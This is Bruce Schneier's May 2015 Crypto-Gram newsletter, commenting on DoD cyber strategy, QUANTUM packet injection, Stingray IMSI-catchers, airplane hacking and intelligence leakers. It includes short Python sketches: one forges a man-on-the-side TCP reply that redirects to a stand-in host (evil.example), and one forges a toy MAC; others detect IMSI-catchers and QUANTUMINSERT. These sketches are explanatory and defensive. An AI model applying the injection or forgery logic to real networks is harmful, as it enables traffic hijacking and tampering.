May 15, 2015
by Bruce Schneier
CTO, Resilient Systems, Inc.
A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.
For back issues, or to subscribe, visit <https://www.schneier.com/crypto-gram.html>.
You can read this issue on the web at <https://www.schneier.com/crypto-gram/archives/2015/…>. These same essays and news items appear in the “Schneier on Security” blog at <http://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.
In this issue:
- Admiral Rogers Speaking at the Joint Service Academy Cyber Security Summit
- The Further Democratization of QUANTUM
- The Further Democratization of Stingray
- Eighth Movie-Plot Threat Contest Semifinalists
- Hacking Airplanes
- Schneier News
- Counting the US Intelligence Community Leakers
- “Hinky” in Action
Admiral Mike Rogers gave the keynote address at the Joint Service Academy Cyber Security Summit yesterday at West Point. He started by explaining the four tenets of security that he thinks about.
First: partnerships. This includes government, civilian, everyone. Capabilities, knowledge, and insight of various groups, and aligning them to generate better outcomes for everyone. Ability to generate and share insight and knowledge, and to do that in a timely manner.
Second, innovation. It’s about much more than just technology. It’s about ways to organize, values, training, and so on. We need to think about innovation very broadly.
Third, technology. This is a technologically based problem, and we need to apply technology to defense as well.
Fourth, human capital. If we don’t get people working right, all of this is doomed to fail. We need to build security workforces inside and outside of military. We need to keep them current in a world of changing technology.
So, what is the Department of Defense doing? They’re investing in cyber, both because it’s a critical part of future fighting of wars and because of the mission to defend the nation.
Rogers then explained the five strategic goals listed in the recent DoD cyber strategy:
1. Build and maintain ready forces and capabilities to conduct cyberspace operations;
2. Defend the DoD information network, secure DoD data, and mitigate risks to DoD missions;
3. Be prepared to defend the U.S. homeland and U.S. vital interests from disruptive or destructive cyberattacks of significant consequence;
4. Build and maintain viable cyber options and plan to use those options to control conflict escalation and to shape the conflict environment at all stages;
5. Build and maintain robust international alliances and partnerships to deter shared threats and increase international security and stability.
Expect to see more detailed policy around these goals in the coming months.
What is the role of US Cyber Command and the NSA in all of this? Cyber Command has three missions related to the five strategic goals. They defend DoD networks. They create the cyber workforce. And, if directed, they defend national critical infrastructure.
At one point, Rogers said that he constantly reminds his people: “If it was designed by man, it can be defeated by man.” I hope he also tells this to the FBI when they talk about needing third-party access to encrypted communications.
All of this has to be underpinned by a cultural ethos that recognizes the importance of professionalism and compliance. Every person with a keyboard is both a potential asset and a threat. There needs to be well-defined processes and procedures within DoD, and a culture of following them.
What’s the threat dynamic, and what’s the nature of the world? The threat is going to increase; it’s going to get worse, not better; cyber is a great equalizer. Cyber doesn’t recognize physical geography. Four “prisms” to look at threat: criminals, nation states, hacktivists, groups wanting to do harm to the nation. This fourth group is increasing. Groups like ISIL are going to use the Internet to cause harm. Also embarrassment: releasing documents, shutting down services, and so on.
We spend a lot of time thinking about how to stop attackers from getting in; we need to think more about how to get them out once they’ve gotten in—and how to continue to operate even though they are in. (That was especially nice to hear, because that’s what I’m doing at my company.) Sony was a “wake-up call”: a nation-state using cyber for coercion. It was theft of intellectual property, denial of service, and destruction. And it was important for the US to acknowledge the attack, attribute it, and retaliate.
Last point: “Total force approach to the problem.” It’s not just about people in uniform. It’s about active duty military, reserve military, corporations, government contractors—everyone. We need to work on this together. “I am not interested in endless discussion…. I am interested in outcomes.” “Cyber is the ultimate team sport.” There’s no single entity, or single technology, or single anything, that will solve all of this. He wants to partner with the corporate world, and to do it in a way that benefits both.
First question was about the domains and missions of the respective services. Rogers talked about the inherent expertise that each service brings to the problem, and how to use cyber to extend that expertise—and the mission. The goal is to create a single integrated cyber force, but not a single service. Cyber occurs in a broader context, and that context is applicable to all the military services. We need to build on their individual expertises and contexts, and to apply it in an integrated way. Similar to how we do special forces.
Second question was about values, intention, and what’s at risk. Rogers replied that any structure for the NSA has to integrate with the nation’s values. He talked about the value of privacy. He also talked about “the security of the nation.” Both are imperatives, and we need to achieve both at the same time. The problem is that the nation is polarized; the threat is getting worse at the same time trust is decreasing. We need to figure out how to improve trust.
Third question was about DoD protecting commercial cyberspace. Rogers replied that the DHS is the lead organization in this regard, and DoD provides capability through that civilian authority. Any DoD partnership with the private sector will go through DHS.
Fourth question: How will DoD reach out to corporations, both established and start-ups? Many ways. By providing people to the private sectors. Funding companies, through mechanisms like the CIA’s In-Q-Tel. And some sort of innovation capability. Those are the three main vectors, but more important is that the DoD mindset has to change. DoD has traditionally been very insular; in this case, more partnerships are required.
Final question was about the NSA sharing security information in some sort of semi-classified way. Rogers said that there are a lot of internal conversations about doing this. It's important.
In all, nothing really new or controversial.
These comments were recorded—I can't find them online now—and are on the record. Much of the rest of the summit was held under the Chatham House Rule. I participated in a panel on "Crypto Wars 2015" with Matt Blaze and a couple of government employees.
I had a photo op with Admiral Rogers. The universe did not explode.
From my book Data and Goliath:
…when I was working with the Guardian on the Snowden documents, the one top-secret program the NSA desperately did not want us to expose was QUANTUM. This is the NSA’s program for what is called packet injection—basically, a technology that allows the agency to hack into computers. Turns out, though, that the NSA was not alone in its use of this technology. The Chinese government uses packet injection to attack computers. The cyberweapons manufacturer Hacking Team sells packet injection technology to any government willing to pay for it. Criminals use it. And there are hacker tools that give the capability to individuals as well. All of these existed before I wrote about QUANTUM. By using its knowledge to attack others rather than to build up the Internet’s defenses, the NSA has worked to ensure that *anyone* can use packet injection to hack into computers.
And that’s true. China’s Great Cannon uses QUANTUM. The ability to inject packets into the backbone is a powerful attack technology, and one that is increasingly being used by different attackers.
Even when technologies are developed inside the NSA, they don’t remain exclusive for long. Today’s top-secret programs become tomorrow’s PhD theses and the next day’s hacker tools.
I could have continued with "and the next day's homework assignment," because Michalis Polychronakis at Stony Brook University has just assigned building a rudimentary QUANTUM tool as a homework assignment. It's basically sniff, regexp match, swap sip/sport/dip/dport/syn/ack, set ack and push flags, and add the payload to create the malicious reply. Shouldn't take more than a few hours to get it working. Of course, it would take a lot more to make it as sophisticated and robust as what the NSA and China have at their disposal, but the moral is that the tool is now in the hands of anyone who wants it. We need to make the Internet secure against this kind of attack instead of pretending that only the "good guys" can use it effectively.
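The header arithmetic behind that assignment fits in a few lines. The sketch below shows just the field-swapping step in isolation; the dict representation, field names, and example addresses are my own illustrative assumptions, not the actual assignment, and a real tool would do the sniffing and injection with a packet-crafting library:

```python
# Sketch of the forged-reply arithmetic in a QUANTUM-style man-on-the-side
# attack: given a sniffed client request, compute the spoofed server response
# that must win the race against the real server. The dict field names here
# are illustrative, not from any particular library or the actual assignment.
import re

def forge_reply(seg, pattern, payload):
    """Return forged-reply fields for a segment whose data matches pattern,
    or None. seg: dict with sip, dip, sport, dport, seq, ack, data."""
    if not re.search(pattern, seg["data"]):
        return None
    return {
        "sip": seg["dip"], "dip": seg["sip"],          # swap addresses
        "sport": seg["dport"], "dport": seg["sport"],  # swap ports
        "seq": seg["ack"],                       # continue the server's stream
        "ack": seg["seq"] + len(seg["data"]),    # acknowledge the client data
        "flags": "PA",                           # set ACK and PUSH flags
        "data": payload,                         # the malicious reply body
    }

request = {"sip": "10.0.0.5", "dip": "93.184.216.34",
           "sport": 51234, "dport": 80,
           "seq": 1000, "ack": 5000,
           "data": b"GET /target HTTP/1.1\r\n\r\n"}
reply = forge_reply(request, rb"GET /target",
                    b"HTTP/1.1 302 Found\r\nLocation: http://evil.example/\r\n\r\n")
print(reply["seq"], reply["ack"], reply["flags"])   # 5000 1024 PA
```

The race itself is the only hard part: the forged reply only works if it reaches the client before the real server's answer does, which is why backbone vantage points are so valuable to attackers.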
End-to-end encryption is the solution. Nicholas Weaver wrote:
The only self defense from all of the above is universal encryption. Universal encryption is difficult and expensive, but unfortunately necessary.
Encryption doesn’t just keep our traffic safe from eavesdroppers, it protects us from attack. DNSSEC validation protects DNS from tampering, while SSL armors both email and web traffic.
There are many engineering and logistic difficulties involved in encrypting all traffic on the internet, but it’s one we must overcome if we are to defend ourselves from the entities that have weaponized the backbone.
And this is true in general. We have one network in the world today. Either we build our communications infrastructure for surveillance, or we build it for security. Either everyone gets to spy, or no one gets to spy. That’s our choice, with the Internet, with cell phone networks, with everything.
Chinese government use of packet injection:
Packet injection hacker tool:
China’s Great Cannon:
Packet injection homework assignment:
The democratization of cyberattack:
Stingray is the code name for an IMSI-catcher, which is basically a fake cell phone tower sold by Harris Corporation to various law enforcement agencies. (It's actually just one of a series of devices with fish names—Amberjack is another—but it's the name used in the media.) What it basically does is trick nearby cell phones into connecting to it. Once that happens, the IMSI-catcher can collect identification and location information of the phones and, in some cases, eavesdrop on phone conversations, text messages, and web browsing. (IMSI stands for International Mobile Subscriber Identity, which is the unique serial number your cell phone broadcasts so that the cellular system knows where you are.)
The use of IMSI-catchers in the US used to be a massive police secret. The FBI is so scared of explaining this capability in public that the agency makes local police sign nondisclosure agreements before using the technique, and has instructed them to lie about their use of it in court. When it seemed possible that local police in Sarasota, Florida, might release documents about Stingray cell phone interception equipment to plaintiffs in civil rights litigation against them, federal marshals seized the documents. More recently, St. Louis police dropped a case rather than talk about the technology in court. And Baltimore police admitted using Stingray over 25,000 times.
The truth is that it’s no longer a massive police secret. We now know a lot about IMSI-catchers. And the US government does not have a monopoly over the use of IMSI-catchers. I wrote in Data and Goliath:
There are dozens of these devices scattered around Washington, DC, and the rest of the country run by who-knows-what government or organization. Criminal uses are next.
From the Washington Post:
How rife? Turner and his colleagues assert that their specially outfitted smartphone, called the GSMK CryptoPhone, had detected signs of as many as 18 IMSI catchers in less than two days of driving through the region. A map of these locations, released Wednesday afternoon, looks like a primer on the geography of Washington power, with the surveillance devices reportedly near the White House, the Capitol, foreign embassies and the cluster of federal contractors near Dulles International Airport.
At the RSA Conference last week, Pwnie Express demonstrated their IMSI-catcher detector.
Building your own IMSI-catcher isn’t hard or expensive. At Def Con in 2010, researcher Chris Paget (now Kristin Paget) demonstrated a homemade IMSI-catcher. The whole thing cost $1,500, which is cheap enough for both criminals and nosy hobbyists.
It’s even cheaper and easier now. Anyone with a HackRF software-defined radio card can turn their laptop into an amateur IMSI-catcher. And this is why companies are building detectors into their security monitoring equipment.
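What those detectors look for can be sketched as a handful of heuristics: a never-before-seen cell ID, an implausibly strong signal, a lone 2G cell advertising no neighbors (consistent with a downgrade attack). The field names and thresholds below are illustrative assumptions on my part, not any vendor's actual detection logic:

```python
# Sketch of the kinds of heuristics an IMSI-catcher detector can apply to
# observed base stations. Field names and thresholds are illustrative only.

def suspicion_score(tower, known_cells):
    """Score an observed base station; higher means more Stingray-like."""
    score = 0
    if tower["cell_id"] not in known_cells:
        score += 1              # never-before-seen cell ID in this area
    if tower["signal_dbm"] > -50:
        score += 1              # implausibly strong signal (transmitter very close)
    if tower["rat"] == "2G" and tower["neighbors"] == []:
        score += 2              # lone 2G cell with no advertised neighbors,
                                # consistent with a forced downgrade
    if tower["lac"] != tower.get("expected_lac", tower["lac"]):
        score += 1              # location area code inconsistent with the region
    return score

known = {"310-260-1234", "310-260-1235"}
rogue = {"cell_id": "310-260-9999", "signal_dbm": -40,
         "rat": "2G", "neighbors": [], "lac": 77, "expected_lac": 12}
print(suspicion_score(rogue, known))   # 5: trips every heuristic
```

None of these signals is conclusive on its own—a new legitimate tower also has an unknown cell ID—which is why detectors combine several of them before raising an alert.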
Two points here. The first is that the FBI should stop treating Stingray like it’s a big secret, so we can start talking about policy.
The second is that we should stop pretending that this capability is exclusive to law enforcement, and recognize that we’re all at risk because of it. If we continue to allow our cellular networks to be vulnerable to IMSI-catchers, then we are all vulnerable to any foreign government, criminal, hacker, or hobbyist that builds one. If we instead engineer our cellular networks to be secure against this sort of attack, then we are safe against all those attackers.
We have one infrastructure. We can’t choose a world where the US gets to spy and the Chinese don’t. We get to choose a world where everyone can spy, or a world where no one can spy. We can be secure from everyone, or vulnerable to anyone.
Like QUANTUM, we have the choice of building our cellular infrastructure for security or for surveillance. Let’s choose security.
Government secrecy around Stingray:
Baltimore police using Stingray:
Stingray is not very secret; everyone is using them:
Building your own IMSI-catcher:
How Stingray illustrates the importance of a secure infrastructure:
Here's an IMSI-catcher for sale on alibaba.com. At this point, every dictator in the world is using this technology against their own citizens.
They’re used extensively in China to send SMS spam without paying the telcos any fees.
On a Food Network show called Mystery Diners—episode 108, “Cabin Fever”—someone used an IMSI-catcher to intercept a phone call between two restaurant employees.
The new model of the IMSI-catcher from Harris Corporation is called Hailstorm. It has the ability to remotely inject malware into cell phones.
Other Harris IMSI-catcher codenames are Kingfish, Gossamer, Triggerfish, Amberjack, and Harpoon. The competitor is DRT, made by the Boeing subsidiary Digital Receiver Technology, Inc.
Here's an IMSI-catcher called Piranha, sold by the Israeli company Rayzone Corp. It claims to work on GSM 2G, 3G, and 4G networks (plus CDMA, of course). The basic Stingray only works on GSM 2G networks, and intercepts phones on the more modern networks by forcing them to downgrade to the 2G protocols. We believe that the more modern IMSI-catchers also work against 3G and 4G networks.
Dan Geer proposes some techniques for figuring out how many vulnerabilities there are in software.
The Congressional Research Service has released a report on the no-fly list and current litigation alleging that it violates due process.
New operational information on the US’s drone program, published by the Intercept and Der Spiegel.
A hacker, Chris Roberts, on a plane waiting to take off tweeted about airplane software vulnerabilities. He was detained by the FBI when he landed. Yes, the real issue here is the chilling effects on security research. Security researchers pointing out security flaws is a good thing, and should be encouraged. But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There's some serious surveillance going on. Now, it is possible that Roberts was being specifically monitored. He is already known as a security researcher who is working on avionics hacking. But still…
An incredibly insecure voting machine.
Federal Trade Commissioner Julie Brill makes some good comments on obscurity.
The history of lockpicking.
A drug dealer claims that the police leaned him over an 18th floor balcony and threatened to kill him if he didn’t give up his password. One of the policemen involved corroborates this story.
This is what’s known as “rubber-hose cryptanalysis,” well-described in this xkcd cartoon.
Interesting article about the surveillance and security issues involving remote proctoring of tests.
Google’s new Chrome extension: Password Alert.
New research paper: “New methods for examining expertise in burglars in natural and simulated environments: preliminary findings”:
This digital privacy awareness video is very well done.
Fox-IT has a blog post (and has published Snort rules) on how to detect man-on-the-side Internet attacks like the NSA’s QUANTUMINSERT.
QUANTUMINSERT detection for Bro, Snort, and Suricata:
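The core of the detection idea is simple: in a man-on-the-side attack, the forged response and the genuine one both eventually arrive, so the same TCP sequence number shows up twice in one flow with different content. The sketch below is a simplification of what the actual Bro/Snort/Suricata rules operate on; the flow representation is my own:

```python
# Sketch of the QUANTUMINSERT detection idea published by Fox-IT: watch each
# TCP flow for two segments with the same sequence number but different
# payloads. Identical duplicates are benign retransmissions; conflicting
# duplicates suggest an injected packet raced the real server's response.
from collections import defaultdict

def find_insert(segments):
    """segments: iterable of (flow_id, seq, payload) tuples.
    Returns flows where one seq was seen with two different payloads."""
    seen = defaultdict(dict)        # flow_id -> {seq: payload}
    alerts = []
    for flow, seq, payload in segments:
        prev = seen[flow].get(seq)
        if prev is not None and prev != payload:
            alerts.append(flow)     # duplicate seq, conflicting content
        else:
            seen[flow][seq] = payload
    return alerts

stream = [
    ("A", 1000, b"HTTP/1.1 302 Found\r\n..."),  # forged reply wins the race
    ("A", 1000, b"HTTP/1.1 200 OK\r\n..."),     # real reply arrives late
    ("B", 2000, b"HTTP/1.1 200 OK\r\n..."),
    ("B", 2000, b"HTTP/1.1 200 OK\r\n..."),     # benign retransmission
]
print(find_insert(stream))   # ['A']
```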
The NSA’s voice-to text capabilities: a new article from the Intercept based on the Snowden documents.
In this long article on the 2005 assassination of Rafik Hariri in Beirut, there’s a detailed section on what the investigators were able to learn from the cell phone metadata (Section 6 of the article).
Matthew Cole explains how the Italian police figured out how the CIA kidnapped Abu Omar in Milan. Interesting use of cell phone metadata, showing how valuable it is for intelligence purposes.
Interesting research on online dating scams.
Stealing a billion by owning a bank.
Cybersecurity summer camps for high-school kids.
Ross Anderson summarizes a meeting in Princeton where Edward Snowden was “present.”
Anyone can design a cipher that he himself cannot break. This is why you should uniformly distrust amateur cryptography, and why you should only use published algorithms that have withstood broad cryptanalysis. All cryptographers know this, but non-cryptographers do not. And this is why we repeatedly see bad amateur cryptography in fielded systems. The latest is the cryptography in the Open Smart Grid Protocol, which is so bad as to be laughable.
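To see why unvetted designs are distrusted by default, consider a hypothetical toy MAC of the kind amateur constructions often resemble—this is an illustration I made up, not the actual OSGP design. Because it is linear, one observed message/tag pair lets an attacker forge valid tags for other messages without ever learning the key:

```python
# A made-up toy "MAC": XOR the message's 4-byte blocks together with the key.
# Because XOR is linear, an attacker who sees one valid (message, tag) pair
# can forge tags for modified messages without knowing the key. This is an
# illustration of why amateur crypto fails, not the actual OSGP construction.

def xor_mac(key, msg):
    """Toy MAC: XOR all 4-byte blocks of msg (zero-padded) with the key."""
    tag = key
    for i in range(0, len(msg), 4):
        tag ^= int.from_bytes(msg[i:i+4].ljust(4, b"\0"), "big")
    return tag

key = 0xDEADBEEF                    # secret; the attacker never sees it
msg = b"PAY alice 10"
tag = xor_mac(key, msg)             # attacker observes (msg, tag)

# Forgery: XOR the block-wise difference between the messages into the tag.
forged_msg = b"PAY mallo 10"
delta = 0
for i in range(0, len(msg), 4):
    a = int.from_bytes(msg[i:i+4].ljust(4, b"\0"), "big")
    b = int.from_bytes(forged_msg[i:i+4].ljust(4, b"\0"), "big")
    delta ^= a ^ b
forged_tag = tag ^ delta
print(xor_mac(key, forged_msg) == forged_tag)   # True: the forgery verifies
```

A vetted MAC such as HMAC-SHA-256 resists exactly this: flipping message bits changes the tag unpredictably, so the differential trick above goes nowhere.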
My still-relevant 1998 essay: “Memo to the Amateur Cipher Designer.”
And my 1999 essay on cryptographic snake oil.
This 1947 document describes a German machine to cryptanalyze the American M-209 mechanical encryption machine. I can’t figure out anything about how it works.
More information on German attacks on the M-209:
On April 1, I announced the Eighth Movie Plot Threat Contest: demonstrate the evils of encryption.
Not a whole lot of good submissions this year. Possibly this contest has run its course, and there’s not a whole lot of interest left. On the other hand, it’s heartening to know that there aren’t a lot of encryption movie-plot threats out there.
Anyway, here are the semifinalists.
1: Child pornographers.
2: Bombing the NSA.
4: Terrorists and a vaccine.
5: Election systems.
Cast your vote by number here; voting closes at the end of the month.
Imagine this: A terrorist hacks into a commercial airplane from the ground, takes over the controls from the pilots and flies the plane into the ground. It sounds like the plot of some “Die Hard” reboot, but it’s actually one of the possible scenarios outlined in a new Government Accountability Office report on security vulnerabilities in modern airplanes.
It’s certainly possible, but in the scheme of Internet risks I worry about, it’s not very high. I’m more worried about the more pedestrian attacks against more common Internet-connected devices. I’m more worried, for example, about a multination cyber arms race that stockpiles capabilities such as this, and prioritizes attack over defense in an effort to gain relative advantage. I worry about the democratization of cyberattack techniques, and who might have the capabilities currently reserved for nation-states. And I worry about a future a decade from now if these problems aren’t addressed.
First, the airplanes. The problem the GAO identifies is one computer security experts have talked about for years. Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.
The report doesn’t explain how someone could do this, and there are currently no known vulnerabilities that a hacker could exploit. But all systems are vulnerable—we simply don’t have the engineering expertise to design and build perfectly secure computers and networks—so of course we believe this kind of attack is theoretically possible.
Previous planes had separate networks, which is much more secure.
As terrifying as this movie-plot threat is—and it has been the plot of several recent works of fiction—this is just one example of an increasingly critical problem: As the computers already critical to running our infrastructure become connected, our vulnerability to cyberattack grows. We’ve already seen vulnerabilities in baby monitors, cars, medical equipment and all sorts of other Internet-connected devices. In February, Toyota recalled 1.9 million Prius cars because of a software vulnerability. Expect similar vulnerabilities in our smart thermostats, smart light bulbs and everything else connected to the smart power grid. The Internet of Things will bring computers into every aspect of our life and society. Those computers will be on the network and will be vulnerable to attack.
And because they’ll all be networked together, a vulnerability in one device will affect the security of everything else. Right now, a vulnerability in your home router can compromise the security of your entire home network. A vulnerability in your Internet-enabled refrigerator can reportedly be used as a launching pad for further attacks.
Future attacks will be exactly like what’s happening on the Internet today with your computer and smartphones, only they will be with everything. It’s all one network, and it’s all critical infrastructure.
Some of these attacks will require sufficient budget and organization to limit them to nation-state aggressors. But that's hardly comforting. North Korea is believed to have launched a massive cyberattack against Sony Pictures last year. Last month, China used a cyberweapon called the "Great Cannon" against the website GitHub. In 2010, the U.S. and Israeli governments launched a sophisticated cyberweapon called Stuxnet against the Iranian Natanz nuclear enrichment facility; it used a series of vulnerabilities to cripple centrifuges critical for separating nuclear material. In fact, the United States has done more to weaponize the Internet than any other country.
Governments only have a fleeting advantage over everyone else, though. Today's top-secret National Security Agency programs become tomorrow's Ph.D. theses and the next day's hacker tools. So while remotely hacking the 787 Dreamliner's avionics might be well beyond the capabilities of anyone except Boeing engineers today, that's not going to be true forever.
What this all means is that we have to start thinking about the security of the Internet of Things—whether the issue in question is today’s airplanes or tomorrow’s smart clothing. We can’t repeat the mistakes of the early days of the PC and then the Internet, where we initially ignored security and then spent years playing catch-up. We have to build security into everything that is going to be connected to the Internet.
This is going to require both significant research and major commitments by companies. It’s also going to require legislation mandating certain levels of security on devices connecting to the Internet, and at network providers that make the Internet work. This isn’t something the market can solve on its own, because there are just too many incentives to ignore security and hope that someone else will solve it.
As a nation, we need to prioritize defense over offense. Right now, the NSA and U.S. Cyber Command have a strong interest in keeping the Internet insecure so they can better eavesdrop on and attack our enemies. But this prioritization cuts both ways: We can’t leave others’ networks vulnerable without also leaving our own vulnerable. And as one of the most networked countries on the planet, we are highly vulnerable to attack. It would be better to focus the NSA’s mission on defense and harden our infrastructure against attack.
Remember the GAO’s nightmare scenario: A hacker on the ground exploits a vulnerability in the airplane’s Wi-Fi system to gain access to the airplane’s network. Then he exploits a vulnerability in the firewall that separates the passengers’ network from the avionics to gain access to the flight controls. Then he uses other vulnerabilities both to lock the pilots out of the cockpit controls and take control of the plane himself.
It’s a scenario made possible by insecure computers and insecure networks. And while it might take a government-led secret project on the order of Stuxnet to pull it off today, that won’t always be true.
Of course, this particular movie-plot threat might never become a real one. But it is almost certain that some equally unlikely scenario will. I just hope we have enough security expertise to deal with whatever it ends up being.
This essay originally appeared on CNN.com.
Older commentary about these vulnerabilities:
Other vulnerabilities in connected devices:
North Korea attacks Sony:
China attacks GitHub:
How the US has weaponized the Internet:
I’m speaking at Sikkerhetsdagen i Troms in Norway—via Skype—on 5/28.
I’m speaking at Info Security Europe in London on 6/3.
I’m speaking at AusCERT in Queensland—via Skype—on 6/5.
I’m speaking at the ISSA Security Summit in Los Angeles on 6/4.
You can now order signed copies of Data and Goliath from my website.
It’s getting hard to keep track of the US intelligence community leakers without a scorecard. So here’s my attempt:
Leaker #1: Edward Snowden.
Leaker #2: The person who leaked secret documents to Jake Appelbaum, Laura Poitras, and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. This might be the “high-ranking NSA employee in Germany”—or maybe that’s someone else entirely.
Leaker #3: "A source in the intelligence community," according to the Intercept, who leaked information about the Terrorist Screening Database, the "second leaker" from the movie Citizenfour. Greenwald promises a lot from him: "Snowden, at a meeting with Greenwald in Moscow, expresses surprise at the level of information apparently coming from this new source. Greenwald, fearing he will be overheard, writes the details on scraps of paper." We have seen nothing since, though. This is probably the leaker the FBI identified, although we have heard nothing further about that, either.
Leaker #4: Someone who is leaking CIA documents.
Leaker #5: The person who leaked secret information about WTO spying to the Intercept and the New Zealand Herald. This isn't Snowden; the Intercept is very careful to identify him as the source when it writes about the documents he provided. Neither publication gives any indication of how the information was obtained. This might be Leaker #2, since it contains X-KEYSCORE rules.
Leaker #6: The person who just leaked secret information about the US drone program to the Intercept and Der Spiegel. This also might be Leaker #2, since there is a Germany connection. According to the Intercept: “The slides were provided by a source with knowledge of the U.S. government’s drone program who declined to be identified because of fears of retribution.” That implies someone new.
Am I missing anyone?
Harvard Law School professor Yochai Benkler has written an excellent law review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing. I wrote about the value of whistleblowers in Data and Goliath.
Way back in June 2013, Glenn Greenwald said that “courage is contagious.” He seems to be correct.
This essay was originally published on Lawfare:
In Beyond Fear, I wrote about trained officials recognizing “hinky” and how it differs from profiling:
Ressam had to clear customs before boarding the ferry. He had fake ID, in the name of Benni Antoine Noris, and the computer cleared him based on this ID. He was allowed to go through after a routine check of his car’s trunk, even though he was wanted by the Canadian police. On the other side of the Strait of Juan de Fuca, at Port Angeles, Washington, Ressam was approached by U.S. customs agent Diana Dean, who asked some routine questions and then decided that he looked suspicious. He was fidgeting, sweaty, and jittery. He avoided eye contact. In Dean’s own words, he was acting “hinky.” More questioning—there was no one else crossing the border, so two other agents got involved—and more hinky behavior. Ressam’s car was eventually searched, and he was finally discovered and captured. It wasn’t any one thing that tipped Dean off; it was everything encompassed in the slang term “hinky.” But the system worked. The reason there wasn’t a bombing at LAX around Christmas in 1999 was because a knowledgeable person was in charge of security and paying attention.
I wrote about this again in 2007:
The key difference is expertise. People trained to be alert for something hinky will do much better than any profiler, but people who have no idea what to look for will do no better than random.
Here’s another story from last year:
On April 28, 2014, Yusuf showed up alone at the Minneapolis Passport Agency and applied for an expedited passport. He wanted to go “sightseeing” in Istanbul, where he was planning to meet someone he recently connected with on Facebook, he allegedly told the passport specialist.
“It’s a guy, just a friend,” he told the specialist, according to court documents.
But when the specialist pressed him for more information about his “friend” in Istanbul and his plans while there, Yusuf couldn’t offer any details, the documents allege.
“[He] became visibly nervous, more soft-spoken, and began to avoid eye contact,” the documents say. “Yusuf did not appear excited or happy to be traveling to Turkey for vacation.”
In fact, the passport specialist “found his interaction with Yusuf so unusual that he contacted his supervisor who, in turn, alerted the FBI to Yusuf’s travel,” according to the court documents.
This is what works. Not profiling. Not bulk surveillance. Not defending against any particular tactics or targets. In the end, this is what keeps us safe.
Me in 2005:
Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <https://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.
Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a "security guru" by The Economist. He is the author of 12 books—including "Liars and Outliers: Enabling the Trust That Society Needs to Thrive"—as well as hundreds of articles, essays, and academic papers. His influential newsletter "Crypto-Gram" and his blog "Schneier on Security" are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation's Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Chief Technology Officer at Resilient Systems, Inc. See <https://www.schneier.com>.
Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of Resilient Systems, Inc.
Copyright (c) 2015 by Bruce Schneier.